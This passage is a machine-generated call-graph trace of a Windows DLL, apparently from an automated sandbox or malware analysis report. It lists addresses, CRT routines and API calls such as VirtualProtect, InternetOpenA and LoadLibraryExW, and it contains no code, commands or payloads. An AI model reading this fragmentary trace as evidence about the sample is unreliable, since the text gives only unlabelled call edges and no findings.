45350 6e805c86 24 API calls __get_errno 45297->45350 45351 6e7f9041 63 API calls 9 library calls 45297->45351 45300 6e7e951d std::_Locinfo::_W_Getmonths 10 API calls 45298->45300 45360 6e7d4849 5 API calls ___report_securityfailure 45299->45360 45303 6e7f9040 45300->45303 45304->45279 45305->45281 45306->45277 45308 6e7f99f0 _strftime 19 API calls 45307->45308 45309 6e7f8bdd 45308->45309 45310 6e7f8b02 std::_Locinfo::_Locinfo_ctor 63 API calls 45309->45310 45336 6e7f8cea 45309->45336 45315 6e7f8c16 45310->45315 45311 6e805c11 std::_Locinfo::_Locinfo_ctor 24 API calls 45311->45315 45312 6e7f8d4f 45313 6e7e951d std::_Locinfo::_W_Getmonths 10 API calls 45312->45313 45314 6e7f8d5b 45313->45314 45317 6e7f8d87 45314->45317 45327 6e7f8da8 45314->45327 45315->45311 45315->45312 45316 6e7f8b02 std::_Locinfo::_Locinfo_ctor 63 API calls 45315->45316 45320 6e7f8cb3 45315->45320 45316->45315 45318 6e7f8d93 45317->45318 45322 6e7f9041 std::_Locinfo::_Locinfo_ctor 63 API calls 45317->45322 45326 6e7d3a8f UnDecorator::getZName SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 45318->45326 45319 6e7f8f27 45319->45318 45321 6e7f8bc3 std::_Locinfo::_Locinfo_ctor 63 API calls 45319->45321 45324 6e7f8cb9 45320->45324 45325 6e7f8d03 45320->45325 45321->45318 45322->45318 45323 6e7f8f35 45328 6e7f854f std::_Locinfo::_Locinfo_ctor 63 API calls 45323->45328 45330 6e7f8cd3 45324->45330 45334 6e7f99b6 _free 18 API calls 45324->45334 45329 6e7f99b6 _free 18 API calls 45325->45329 45331 6e7f902b 45326->45331 45327->45319 45327->45323 45342 6e7f8dea std::_Locinfo::_Locinfo_ctor try_get_first_available_module 45327->45342 45337 6e7f8f51 45328->45337 45332 6e7f8d09 45329->45332 45335 6e7f99b6 _free 18 API calls 45330->45335 45330->45336 45331->45285 45333 6e7f8d24 45332->45333 45338 6e7f99b6 _free 18 API calls 45332->45338 45333->45336 45339 6e7f99b6 _free 18 API calls 45333->45339 45334->45330 45335->45336 45336->45285 45337->45318 45337->45319 45340 6e7f9041 std::_Locinfo::_Locinfo_ctor 63 API calls 45337->45340 45338->45333 45339->45336 45340->45337 45341 6e805d53 std::_Locinfo::_Locinfo_ctor 24 API calls 45341->45342 45342->45318 45342->45319 45342->45341 45343 6e7f9034 45342->45343 45344 6e7f902f 45342->45344 45346 6e7f9041 std::_Locinfo::_Locinfo_ctor 63 API calls 45342->45346 45345 6e7e951d std::_Locinfo::_W_Getmonths 10 API calls 45343->45345 45347 6e7d4849 std::_Locinfo::_Locinfo_ctor 5 API calls 45344->45347 45348 6e7f9040 45345->45348 45346->45342 45347->45343 45349->45285 45350->45297 45351->45297 45352->45294 45353->45294 45355 6e7d3a98 45354->45355 45356 6e7d3a9a 45354->45356 45355->45293 45357 6e7d4764 45356->45357 45358 6e7d4728 ___raise_securityfailure SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 45357->45358 45359 6e7d4847 45358->45359 45359->45293 45360->45298 45362 6e7ffe50 45361->45362 45363 6e7ffe54 45362->45363 45364 6e7ffe6e 45362->45364 45382 6e7eb2cd 18 API calls __dosmaperr 45363->45382 45384 6e7dfc6a 45364->45384 45366 6e7ffe5f 45383 6e7e94f0 24 API calls __get_errno 45366->45383 45370 6e7ffe98 45392 6e7eb2cd 18 API calls __dosmaperr 45370->45392 45371 6e7ffea1 45393 6e7ffcb5 39 API calls 2 library calls 45371->45393 45374 6e7ffeaf 45376 6e7ffeb7 45374->45376 45380 6e7ffec9 45374->45380 45375 6e7ffe9d 45396 6e7e94f0 24 API calls __get_errno 45375->45396 45394 6e7eb2cd 18 API calls __dosmaperr 45376->45394 45377 6e7eafdc 45377->45133 45377->45219 45380->45377 45395 6e7eb2cd 18 API calls __dosmaperr 45380->45395 45382->45366 45383->45377 45385 6e7dfc7d 45384->45385 45386 6e7dfc87 45384->45386 45385->45370 45385->45371 45386->45385 45387 6e7f7d21 numpunct 35 API calls 45386->45387 45388 6e7dfca8 45387->45388 45397 6e7f7e7c 35 API calls numpunct 45388->45397 45390 6e7dfcc1 45398 6e7f7ea9 35 API calls __fassign 45390->45398 45392->45375 45393->45374 45394->45377 45395->45375 45396->45377 45397->45390 45398->45385 45399->45220 45400->45224 45401->45168 45402->45174 45403->45179 45404->45182 45406 6e7e931e ___scrt_fastfail 45405->45406 45407 6e7e934a IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 45406->45407 45408 6e7e941b ___scrt_fastfail 45407->45408 45409 6e7d3a8f UnDecorator::getZName 4 API calls 45408->45409 45410 6e7e9439 GetCurrentProcess TerminateProcess 45409->45410 45410->45114 45411->45194 45412->45193 45413->45202 45414 6e7d43bf 45415 6e7d43cb ___unDNameEx 45414->45415 45416 6e7d43f4 dllmain_raw 45415->45416 45417 6e7d43da 45415->45417 45418 6e7d43ef 45415->45418 45416->45417 45419 6e7d440e dllmain_crt_dispatch 45416->45419 45427 6e7998b0 45418->45427 45419->45417 45419->45418 45422 6e7d445b 45422->45417 45423 6e7d4464 dllmain_crt_dispatch 45422->45423 45423->45417 45425 6e7d4477 dllmain_raw 45423->45425 45424 6e7998b0 30 API calls 45426 6e7d4447 dllmain_crt_dispatch dllmain_raw 45424->45426 45425->45417 45426->45422 45443 6e7e959d 45427->45443 45431 6e7999d6 FindFirstChangeNotificationA 45433 6e799a92 45431->45433 45461 6e79bd70 22 API calls std::locale::_Locimp::_Makeloc 45433->45461 45435 6e799cb1 45436 6e799ec5 45435->45436 45438 6e799f03 45435->45438 45437 6e7d3a8f UnDecorator::getZName 4 API calls 45436->45437 45439 6e799efd 45437->45439 45462 6e7e9500 24 API calls 2 library calls 45438->45462 45439->45422 45439->45424 45448 6e7f99f0 _strftime 45443->45448 45444 6e7f9a2e 45464 6e7eb2cd 18 API calls __dosmaperr 45444->45464 45445 6e7f9a19 RtlAllocateHeap 45447 6e7998e4 45445->45447 45445->45448 45450 6e79d560 45447->45450 45448->45444 45448->45445 45463 6e7f4908 6 API calls 2 library calls 45448->45463 45451 6e79d59c 45450->45451 45452 6e79d575 BuildCatchObjectHelperInternal 45450->45452 45453 6e79d609 45451->45453 45454 6e79d5e6 45451->45454 45455 6e79d677 codecvt 45451->45455 45452->45431 45457 6e7d3d9b std::locale::_Locimp::_Makeushloc 20 API calls 45453->45457 45459 6e79d5f7 codecvt 45453->45459 45465 6e7d3d9b 45454->45465 45455->45431 45457->45459 45460 6e79d65a 45459->45460 45473 6e7e9500 24 API calls 2 library calls 45459->45473 45460->45431 45461->45435 45463->45448 45464->45447 45468 6e7d3da0 45465->45468 45466 6e7e959d ___crtLCMapStringA 19 API calls 45466->45468 45467 6e7d3dba 45467->45459 45468->45466 45468->45467 45470 6e7d3dbc std::locale::_Locimp::_Makeushloc 45468->45470 45474 6e7f4908 6 API calls 2 library calls 45468->45474 45475 6e7d5ba4 RaiseException 45470->45475 45472 6e7d4c90 45474->45468 45475->45472 45476 6e7d44f9 45477 6e7d4507 dllmain_dispatch 45476->45477 45478 6e7d4502 45476->45478 45480 6e7d4ee8 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___get_entropy 45478->45480 45480->45477 45481 6e7bc57f 45488 6e7bc2cb 45481->45488 45483 6e7bc58a 45494 6e7bcc5f 45483->45494 45485 6e7bc59d 45486 6e7bc5c2 45485->45486 45498 6e7bed2b 4 API calls 2 library calls 45485->45498 45489 6e7bc2d7 __EH_prolog3 45488->45489 45490 6e7d3d9b std::locale::_Locimp::_Makeushloc 20 API calls 45489->45490 45491 6e7bc30f 45490->45491 45493 6e7bc320 numpunct 45491->45493 45499 6e7bd2d3 45491->45499 45493->45483 45495 6e7bcc6b __EH_prolog3 45494->45495 45546 6e79fc60 45495->45546 45497 6e7bcc83 numpunct 45497->45485 45498->45486 45500 6e7bd2df __EH_prolog3 45499->45500 45511 6e7bb316 45500->45511 45505 6e7bd2fd 45522 6e7bd492 45505->45522 45506 6e7bd31b 45527 6e7bb37d RtlLeaveCriticalSection RtlLeaveCriticalSection std::_Lockit::~_Lockit 45506->45527 45507 6e7bd35b numpunct 45507->45493 45512 6e7bb32c 45511->45512 45513 6e7bb325 45511->45513 45515 6e7bb32a 45512->45515 45529 6e7be307 RtlEnterCriticalSection 45512->45529 45528 6e7e9ac1 RtlEnterCriticalSection std::_Lockit::_Lockit 45513->45528 45515->45506 45517 6e7bd46f 45515->45517 45518 6e7d3d9b std::locale::_Locimp::_Makeushloc 20 API calls 45517->45518 45519 6e7bd47a 45518->45519 45520 6e7bd48e 45519->45520 45521 6e7bd482 std::locale::_Locimp::_Locimp 45519->45521 45520->45505 45521->45505 45523 6e7bd49e 45522->45523 45524 6e7bd305 45522->45524 45530 6e7bee95 45523->45530 45526 6e7bd209 19 API calls 2 library calls 45524->45526 45526->45506 45527->45507 45528->45515 45529->45515 45531 6e7eb3a9 45530->45531 45532 6e7beea5 RtlEncodePointer 45530->45532 45543 6e80050e RtlEnterCriticalSection RtlLeaveCriticalSection _abort 45531->45543 45532->45524 45534 6e7eb3ae 45535 6e7eb3b9 45534->45535 45544 6e800572 35 API calls 7 library calls 45534->45544 45537 6e7eb3e1 45535->45537 45538 6e7eb3c3 IsProcessorFeaturePresent 45535->45538 45545 6e7f4e2b 25 API calls _abort 45537->45545 45540 6e7eb3ce 45538->45540 45542 6e7e9302 _abort 7 API calls 45540->45542 45541 6e7eb3eb 45541->45524 45542->45537 45543->45534 45544->45535 45545->45541 45547 6e7bb316 std::_Lockit::_Lockit 2 API calls 45546->45547 45548 6e79fcac 45547->45548 45549 6e7bb316 std::_Lockit::_Lockit 2 API calls 45548->45549 45552 6e79fcf6 std::locale::_Locimp::_Makeloc 45548->45552 45550 6e79fcce 45549->45550 45561 6e7bb37d RtlLeaveCriticalSection RtlLeaveCriticalSection std::_Lockit::~_Lockit 45550->45561 45555 6e7d3d9b std::locale::_Locimp::_Makeushloc 20 API calls 45552->45555 45560 6e79fd3e 45552->45560 45554 6e79fe2c 45554->45497 45556 6e79fd4c 45555->45556 45562 6e7bdcbc 35 API calls 2 library calls 45556->45562 45558 6e79fdc6 45563 6e7bd2a1 20 API calls std::locale::_Locimp::_Makeushloc 45558->45563 45564 6e7bb37d RtlLeaveCriticalSection RtlLeaveCriticalSection std::_Lockit::~_Lockit 45560->45564 45561->45552 45562->45558 45563->45560 45564->45554 45565 6e7facda GetStartupInfoW 45566 6e7fad89 45565->45566 45567 6e7facf7 45565->45567 45567->45566 45571 6e8099fd 45567->45571 45569 6e7fad20 45569->45566 45570 6e7fad4e GetFileType 45569->45570 45570->45569 45572 6e809a09 ___unDNameEx 45571->45572 45573 6e809a16 45572->45573 45574 6e809a2d 45572->45574 45592 6e7eb2cd 18 API calls __dosmaperr 45573->45592 45584 6e7e9a62 RtlEnterCriticalSection 45574->45584 45577 6e809a1b 45593 6e7e94f0 24 API calls __get_errno 45577->45593 45579 6e809a25 __fread_nolock 45579->45569 45580 6e809a65 45594 6e809a8c RtlLeaveCriticalSection std::_Lockit::~_Lockit 45580->45594 45582 6e809a39 45582->45580 45585 6e80994e 45582->45585 45584->45582 45586 6e7f9456 numpunct 18 API calls 45585->45586 45588 6e809960 45586->45588 45587 6e80996d 45589 6e7f99b6 _free 18 API calls 45587->45589 45588->45587 45595 6e7fcad1 45588->45595 45591 6e8099bf 45589->45591 45591->45582 45592->45577 45593->45579 45594->45579 45602 6e7fc3a3 45595->45602 45597 6e7fcaf8 45598 6e7fcb16 InitializeCriticalSectionAndSpinCount 45597->45598 45599 6e7fcb01 45597->45599 45598->45599 45600 6e7d3a8f UnDecorator::getZName 4 API calls 45599->45600 45601 6e7fcb2d 45600->45601 45601->45588 45603 6e7fc3cf 45602->45603 45605 6e7fc3d3 __crt_fast_encode_pointer 45602->45605 45603->45605 45606 6e7fc43f 45603->45606 45605->45597 45607 6e7fc460 LoadLibraryExW 45606->45607 45612 6e7fc455 45606->45612 45608 6e7fc47d GetLastError 45607->45608 45609 6e7fc495 45607->45609 45608->45609 45610 6e7fc488 LoadLibraryExW 45608->45610 45611 6e7fc4ac FreeLibrary 45609->45611 45609->45612 45610->45609 45611->45612 45612->45603 45613 6e7f4ed8 45614 6e7f4ee7 45613->45614 45615 6e7f4f03 45613->45615 45614->45615 45616 6e7f4eed 45614->45616 45633 6e803aaf 45615->45633 45637 6e7eb2cd 18 API calls __dosmaperr 45616->45637 45620 6e7f4ef2 45638 6e7e94f0 24 API calls __get_errno 45620->45638 45622 6e7f4efc 45623 6e7f4f2e 45639 6e7f54cd 18 API calls 2 library calls 45623->45639 45625 6e7f4f58 45626 6e7f4f61 45625->45626 45630 6e7f4f6d 45625->45630 45640 6e7eb2cd 18 API calls __dosmaperr 45626->45640 45628 6e7f4f66 45629 6e7f99b6 _free 18 API calls 45628->45629 45631 6e7f4ff2 45629->45631 45630->45628 45632 6e7f99b6 _free 18 API calls 45630->45632 45631->45622 45632->45628 45634 6e803ab8 45633->45634 45635 6e7f4f0a GetModuleFileNameA 45633->45635 45641 6e8039ae 45634->45641 45635->45623 45637->45620 45638->45622 45639->45625 45640->45628 45642 6e7f7d21 numpunct 35 API calls 45641->45642 45643 6e8039bb 45642->45643 45661 6e803acd 45643->45661 45645 6e8039c3 45670 6e803742 45645->45670 45648 6e8039da 45648->45635 45649 6e7f99f0 _strftime 19 API calls 45650 6e8039eb 45649->45650 45660 6e803a1d 45650->45660 45677 6e803bc4 45650->45677 45653 6e7f99b6 _free 18 API calls 45653->45648 45654 6e803a18 45687 6e7eb2cd 18 API calls __dosmaperr 45654->45687 45656 6e803a61 45656->45660 45688 6e803618 24 API calls 45656->45688 45657 6e803a35 45657->45656 45658 6e7f99b6 _free 18 API calls 45657->45658 45658->45656 45660->45653 45662 6e803ad9 ___unDNameEx 45661->45662 45663 6e7f7d21 numpunct 35 API calls 45662->45663 45668 6e803ae3 45663->45668 45665 6e803b67 __fread_nolock 45665->45645 45668->45665 45669 6e7f99b6 _free 18 API calls 45668->45669 45689 6e7eb3a9 35 API calls _abort 45668->45689 45690 6e7e9a62 RtlEnterCriticalSection 45668->45690 45691 6e803b5e RtlLeaveCriticalSection std::_Lockit::~_Lockit 45668->45691 45669->45668 45671 6e7dfc6a __fassign 35 API calls 45670->45671 45672 6e803754 45671->45672 45673 6e803763 GetOEMCP 45672->45673 45674 6e803775 45672->45674 45676 6e80378c 45673->45676 45675 6e80377a GetACP 45674->45675 45674->45676 45675->45676 45676->45648 45676->45649 45678 6e803742 37 API calls 45677->45678 45679 6e803be3 45678->45679 45682 6e803c34 IsValidCodePage 45679->45682 45684 6e803bea 45679->45684 45686 6e803c59 45679->45686 45680 6e7d3a8f UnDecorator::getZName 4 API calls 45681 6e803a10 45680->45681 45681->45654 45681->45657 45683 6e803c46 GetCPInfo 45682->45683 45682->45684 45683->45684 45683->45686 45684->45680 45692 6e80381a GetCPInfo 45686->45692 45687->45660 45688->45660 45689->45668 45690->45668 45691->45668 45698 6e803854 45692->45698 45701 6e8038fe 45692->45701 45695 6e7d3a8f UnDecorator::getZName 4 API calls 45697 6e8039aa 45695->45697 45697->45684 45702 6e7fbdaf 45698->45702 45700 6e7f9879 __Stoullx 40 API calls 45700->45701 45701->45695 45703 6e7dfc6a __fassign 35 API calls 45702->45703 45704 6e7fbdcf MultiByteToWideChar 45703->45704 45706 6e7fbe0d 45704->45706 45710 6e7fbe9f __freea 45704->45710 45708 6e7f99f0 _strftime 19 API calls 45706->45708 45711 6e7fbe2e ___crtLCMapStringA 45706->45711 45707 6e7d3a8f UnDecorator::getZName 4 API calls 45709 6e7fbec8 45707->45709 45708->45711 45714 6e7f9879 45709->45714 45710->45707 45711->45710 45712 6e7fbe73 MultiByteToWideChar 45711->45712 45712->45710 45713 6e7fbe8f GetStringTypeW 45712->45713 45713->45710 45715 6e7dfc6a __fassign 35 API calls 45714->45715 45716 6e7f988c 45715->45716 45719 6e7f965c 45716->45719 45720 6e7f9677 ___crtLCMapStringA 45719->45720 45721 6e7f969d MultiByteToWideChar 45720->45721 45722 6e7f96c7 45721->45722 45734 6e7f979d __freea 45721->45734 45725 6e7f99f0 _strftime 19 API calls 45722->45725 45727 6e7f96e8 ___crtLCMapStringA 45722->45727 45723 6e7d3a8f UnDecorator::getZName 4 API calls 45724 6e7f9864 45723->45724 45724->45700 45725->45727 45726 6e7f9731 MultiByteToWideChar 45728 6e7f974a 45726->45728 45726->45734 45727->45726 45727->45734 45740 6e7fcc00 45728->45740 45731 6e7f97ac 45735 6e7f99f0 _strftime 19 API calls 45731->45735 45737 6e7f97cd ___crtLCMapStringA 45731->45737 45732 6e7f9774 45733 6e7fcc00 __Stoullx 9 API calls 45732->45733 45732->45734 45733->45734 45734->45723 45735->45737 45736 6e7fcc00 __Stoullx 9 API calls 45738 6e7f9821 45736->45738 45737->45734 45737->45736 45738->45734 45739 6e7f9830 WideCharToMultiByte 45738->45739 45739->45734 45741 6e7fc3a3 numpunct 4 API calls 45740->45741 45742 6e7fcc27 45741->45742 45745 6e7fcc30 45742->45745 45748 6e7fcc88 8 API calls 3 library calls 45742->45748 45744 6e7fcc70 LCMapStringW 45744->45745 45746 6e7d3a8f UnDecorator::getZName 4 API calls 45745->45746 45747 6e7f9761 45746->45747 45747->45731 45747->45732 45747->45734 45748->45744 45749 6e7fc654 45750 6e7fc3a3 numpunct 4 API calls 45749->45750 45751 6e7fc67b 45750->45751 45752 6e7fc693 TlsAlloc 45751->45752 45753 6e7fc684 45751->45753 45752->45753 45754 6e7d3a8f UnDecorator::getZName 4 API calls 45753->45754 45755 6e7fc6a4 45754->45755 45756 6e778c5b 45757 6e778c66 45756->45757 45758 6e778c99 45756->45758 45760 6e778c8b 45757->45760 45761 6e778c6b 45757->45761 45784 6e778db5 84 API calls 4 library calls 45758->45784 45768 6e778cae 45760->45768 45763 6e778c81 45761->45763 45764 6e778c70 45761->45764 45783 6e7789f0 23 API calls 45763->45783 45767 6e778c75 45764->45767 45782 6e778a0f 21 API calls 45764->45782 45769 6e778cba ___scrt_is_nonwritable_in_current_image 45768->45769 45785 6e778a80 45769->45785 45771 6e778cc1 __DllMainCRTStartup@12 45772 6e778dad 45771->45772 45773 6e778ce8 45771->45773 45779 6e778d24 ___scrt_is_nonwritable_in_current_image __InternalCxxFrameHandler 45771->45779 45799 6e7791bb IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter __InternalCxxFrameHandler 45772->45799 45796 6e7789e2 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 45773->45796 45776 6e778db4 45777 6e778cf7 __RTC_Initialize 45777->45779 45797 6e7795b4 InitializeSListHead 45777->45797 45779->45767 45780 6e778d05 45780->45779 45798 6e7789b7 IsProcessorFeaturePresent ___scrt_release_startup_lock 45780->45798 45782->45767 45783->45767 45784->45767 45786 6e778a89 45785->45786 45800 6e7792e1 IsProcessorFeaturePresent 45786->45800 45788 6e778a95 45801 6e779baf 45788->45801 45790 6e778a9a 45791 6e778a9e 45790->45791 45809 6e77d098 45790->45809 45791->45771 45794 6e778ab5 45794->45771 45796->45777 45797->45780 45798->45779 45799->45776 45800->45788 45813 6e77aecc 7 API calls 2 library calls 45801->45813 45803 6e779bb4 45808 6e779bb8 45803->45808 45814 6e77a05b 45803->45814 45805 6e779bc0 45806 6e779bcb 45805->45806 45822 6e77af08 DeleteCriticalSection 45805->45822 45806->45790 45808->45790 45845 6e78072f 45809->45845 45812 6e779be4 7 API calls 2 library calls 45812->45791 45813->45803 45823 6e77b18a 45814->45823 45817 6e77a070 45817->45805 45819 6e77a07e 45820 6e77a08b 45819->45820 45829 6e77a08e 6 API calls ___vcrt_FlsFree 45819->45829 45820->45805 45822->45808 45830 6e77b141 45823->45830 45826 6e77b1bd TlsAlloc 45827 6e77a065 45827->45817 45828 6e77b23b 6 API calls ___vcrt_FlsFree 45827->45828 45828->45819 45829->45817 45831 6e77b182 45830->45831 45832 6e77b159 45830->45832 45831->45826 45831->45827 45832->45831 45837 6e77b0a7 45832->45837 45835 6e77b16e GetProcAddress 45835->45831 45836 6e77b17c 45835->45836 45836->45831 45843 6e77b0b3 ___vcrt_FlsFree 45837->45843 45838 6e77b127 45838->45831 45838->45835 45839 6e77b0c9 LoadLibraryExW 45840 6e77b0e7 GetLastError 45839->45840 45841 6e77b12e 45839->45841 45840->45843 45841->45838 45842 6e77b136 FreeLibrary 45841->45842 45842->45838 45843->45838 45843->45839 45844 6e77b109 LoadLibraryExW 45843->45844 45844->45841 45844->45843 45846 6e78073f 45845->45846 45847 6e778aa7 45845->45847 45846->45847 45849 6e77dd05 45846->45849 45847->45794 45847->45812 45850 6e77dd11 ___scrt_is_nonwritable_in_current_image 45849->45850 45861 6e77ddd2 EnterCriticalSection 45850->45861 45852 6e77dd18 45862 6e780e4d 45852->45862 45855 6e77dd36 45877 6e77dd5c LeaveCriticalSection __InternalCxxFrameHandler 45855->45877 45858 6e77dd47 45858->45846 45859 6e77dd31 45876 6e77dc51 GetStdHandle GetFileType 45859->45876 45861->45852 45863 6e780e59 ___scrt_is_nonwritable_in_current_image 45862->45863 45864 6e780e62 45863->45864 45865 6e780e83 45863->45865 45886 6e77d59b 14 API calls _free 45864->45886 45878 6e77ddd2 EnterCriticalSection 45865->45878 45868 6e780e67 45887 6e77d4de 25 API calls ___std_exception_copy 45868->45887 45870 6e77dd27 45870->45855 45875 6e77db9b 28 API calls 45870->45875 45871 6e780ebb 45888 6e780ee2 LeaveCriticalSection __InternalCxxFrameHandler 45871->45888 45872 6e780e8f 45872->45871 45879 6e780d9d 45872->45879 45875->45859 45876->45855 45877->45858 45878->45872 45880 6e77d5e9 _unexpected 14 API calls 45879->45880 45883 6e780daf 45880->45883 45881 6e780dbc 45894 6e77d646 14 API calls _free 45881->45894 45883->45881 45889 6e77d976 45883->45889 45885 6e780e11 45885->45872 45886->45868 45887->45870 45888->45870 45890 6e77d795 _unexpected 5 API calls 45889->45890 45891 6e77d992 45890->45891 45892 6e77d9b0 InitializeCriticalSectionAndSpinCount 45891->45892 45893 6e77d99b 45891->45893 45892->45893 45893->45883 45894->45885 45895 6e778f9b 45896 6e778fa4 45895->45896 45897 6e778fa9 45895->45897 45912 6e779563 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___get_entropy 45896->45912 45901 6e778e65 45897->45901 45902 6e778e71 ___scrt_is_nonwritable_in_current_image 45901->45902 45903 6e778e9a dllmain_raw 45902->45903 45904 6e778e80 45902->45904 45909 6e778e95 __DllMainCRTStartup@12 45902->45909 45903->45904 45905 6e778eb4 dllmain_crt_dispatch 45903->45905 45905->45904 45905->45909 45906 6e778f06 45906->45904 45907 6e778f0f dllmain_crt_dispatch 45906->45907 45907->45904 45908 6e778f22 dllmain_raw 45907->45908 45908->45904 45909->45906 45913 6e778db5 84 API calls 4 library calls 45909->45913 45911 6e778efb dllmain_raw 45911->45906 45912->45897 45913->45911 45914 6e7d41d0 45915 6e7d420e dllmain_crt_process_detach 45914->45915 45916 6e7d41db 45914->45916 45923 6e7d41ea 45915->45923 45917 6e7d4200 dllmain_crt_process_attach 45916->45917 45918 6e7d41e0 45916->45918 45917->45923 45919 6e7d41e5 45918->45919 45920 6e7d41f6 45918->45920 45919->45923 45924 6e7d3ee6 6 API calls 45919->45924 45925 6e7d3ec7 8 API calls 45920->45925 45924->45923 45925->45923 45926 6e7bbc54 45927 6e7bbc60 __EH_prolog3 45926->45927 45928 6e7d3d9b std::locale::_Locimp::_Makeushloc 20 API calls 45927->45928 45929 6e7bbc6f 45928->45929 45930 6e7bd2d3 std::locale::_Init 42 API calls 45929->45930 45931 6e7bbc81 std::locale::_Locimp::_Makeloc numpunct 45929->45931 45930->45931 45932 6e79748b 45933 6e797481 45932->45933 45933->45932 45934 6e797c69 45933->45934 45937 6e7979dd Sleep 45933->45937 45938 6e7967f0 45934->45938 45937->45933 45939 6e796810 VirtualProtect 45938->45939 45941 6e796889 45939->45941 45942 6e77f0e4 45950 6e77d877 45942->45950 45945 6e77f0f8 45947 6e77f100 45948 6e77f10d 45947->45948 45956 6e77f110 6 API calls __DllMainCRTStartup@12 45947->45956 45951 6e77d795 _unexpected 5 API calls 45950->45951 45952 6e77d893 45951->45952 45953 6e77d8ab TlsAlloc 45952->45953 45954 6e77d89c 45952->45954 45953->45954 45954->45945 45955 6e77f02f 14 API calls 2 library calls 45954->45955 45955->45947 45956->45945 45957 6e8041b4 GetEnvironmentStringsW 45958 6e8041cb 45957->45958 45968 6e80421e 45957->45968 45961 6e8041d1 WideCharToMultiByte 45958->45961 45959 6e804227 FreeEnvironmentStringsW 45960 6e80422e 45959->45960 45962 6e8041ed 45961->45962 45961->45968 45963 6e7f99f0 _strftime 19 API calls 45962->45963 45964 6e8041f3 45963->45964 45965 6e8041fa WideCharToMultiByte 45964->45965 45966 6e804210 45964->45966 45965->45966 45967 6e7f99b6 _free 18 API calls 45966->45967 45967->45968 45968->45959 45968->45960 45969 6e776ceb 45970 6e776cfa __EH_prolog3_GS 45969->45970 46123 6e7766b9 45970->46123 45973 6e776d12 46141 6e77111c 45973->46141 45974 6e77111c 62 API calls 45976 6e776d0b 45974->45976 46320 6e77549f 19 API calls 45976->46320 45977 6e776d1a 46151 6e77657f 45977->46151 45980 6e776de0 45981 6e77111c 62 API calls 45980->45981 45982 6e776dec 45981->45982 45983 6e77657f 19 API calls 45982->45983 45987 6e776ecf 45983->45987 45984 6e77706a 45986 6e77111c 62 API calls 45984->45986 45985 6e776f4c lstrcpyW 46321 6e77c228 25 API calls 2 library calls 45985->46321 45989 6e777081 45986->45989 45987->45984 45987->45985 46154 6e775423 45989->46154 45990 6e776f6a 45992 6e776f8e 45990->45992 45995 6e77111c 62 API calls 45990->45995 45994 6e77111c 62 API calls 45992->45994 45996 6e776f98 45994->45996 45998 6e776f79 45995->45998 46002 6e77657f 19 API calls 45996->46002 45997 6e77111c 62 API calls 45999 6e7771f1 45997->45999 46000 6e775423 19 API calls 45998->46000 46158 6e776599 45999->46158 46003 6e776f80 46000->46003 46002->45984 46004 6e77111c 62 API calls 46003->46004 46007 6e776f87 46004->46007 46005 6e7771f8 46006 6e777239 46005->46006 46008 6e77111c 62 API calls 46005->46008 46011 6e77111c 62 API calls 46006->46011 46322 6e77549f 19 API calls 46007->46322 46010 6e777203 46008->46010 46323 6e7752ed 19 API calls 46010->46323 46013 6e77739d 46011->46013 46015 6e776599 20 API calls 46013->46015 46014 6e77720a 46016 6e77722c 46014->46016 46020 6e77111c 62 API calls 46014->46020 46017 6e7773a4 46015->46017 46019 6e77111c 62 API calls 46016->46019 46018 6e7773e0 46017->46018 46021 6e77111c 62 API calls 46017->46021 46024 6e77111c 62 API calls 46018->46024 46022 6e777232 46019->46022 46023 6e777217 46020->46023 46025 6e7773b2 46021->46025 46326 6e77516c 19 API calls 46022->46326 46324 6e77516c 19 API calls 46023->46324 46028 6e7773e5 46024->46028 46327 6e7752ed 19 API calls 46025->46327 46034 6e77657f 19 API calls 46028->46034 46030 6e77721e 46031 6e77111c 62 API calls 46030->46031 46033 6e777225 46031->46033 46032 6e7773b9 46032->46018 46037 6e77111c 62 API calls 46032->46037 46325 6e77549f 19 API calls 46033->46325 46036 6e777470 CoInitializeEx 46034->46036 46038 6e77748c 46036->46038 46039 6e777479 46036->46039 46040 6e7773cb 46037->46040 46043 6e777497 46038->46043 46162 6e776741 46038->46162 46330 6e776cd4 63 API calls 46039->46330 46328 6e77516c 19 API calls 46040->46328 46047 6e77111c 62 API calls 46043->46047 46044 6e77747e 46048 6e77111c 62 API calls 46044->46048 46045 6e7773d2 46049 6e77111c 62 API calls 46045->46049 46050 6e77749c 46047->46050 46051 6e777485 46048->46051 46052 6e7773d9 46049->46052 46053 6e77657f 19 API calls 46050->46053 46331 6e77549f 19 API calls 46051->46331 46329 6e77549f 19 API calls 46052->46329 46056 6e77755d InternetOpenA 46053->46056 46057 6e777581 46056->46057 46058 6e77756e 46056->46058 46179 6e773b7e 46057->46179 46332 6e776cd4 63 API calls 46058->46332 46061 6e777573 46062 6e77111c 62 API calls 46061->46062 46065 6e77757a 46062->46065 46063 6e7779fd 46064 6e77111c 62 API calls 46063->46064 46066 6e777a08 46064->46066 46333 6e77549f 19 API calls 46065->46333 46069 6e778517 20 API calls 46066->46069 46068 6e7775a8 46068->46063 46070 6e77111c 62 API calls 46068->46070 46071 6e777a10 46069->46071 46072 6e777615 46070->46072 46339 6e776cd4 63 API calls 46071->46339 46200 6e7750b1 46072->46200 46075 6e777a15 46077 6e77111c 62 API calls 46075->46077 46079 6e777a1c 46077->46079 46340 6e77549f 19 API calls 46079->46340 46081 6e77111c 62 API calls 46083 6e7776e5 46081->46083 46082 6e777a23 46341 6e773be3 46082->46341 46204 6e774ff4 46083->46204 46088 6e777a3a 46348 6e784386 46088->46348 46090 6e7776ec 46090->46090 46208 6e773c02 46090->46208 46093 6e7777eb 46094 6e7779e1 46093->46094 46095 6e77111c 62 API calls 46093->46095 46094->46063 46097 6e77111c 62 API calls 46094->46097 46096 6e777819 46095->46096 46216 6e773efc 46096->46216 46099 6e7779f5 46097->46099 46335 6e778517 46099->46335 46102 6e7779d5 46104 6e77111c 62 API calls 46102->46104 46103 6e777829 46103->46094 46220 6e773015 46103->46220 46106 6e7779da 46104->46106 46334 6e7752ed 19 API calls 46106->46334 46107 6e777849 46109 6e773015 71 API calls 46107->46109 46110 6e777850 46109->46110 46230 6e774985 46110->46230 46113 6e7779c3 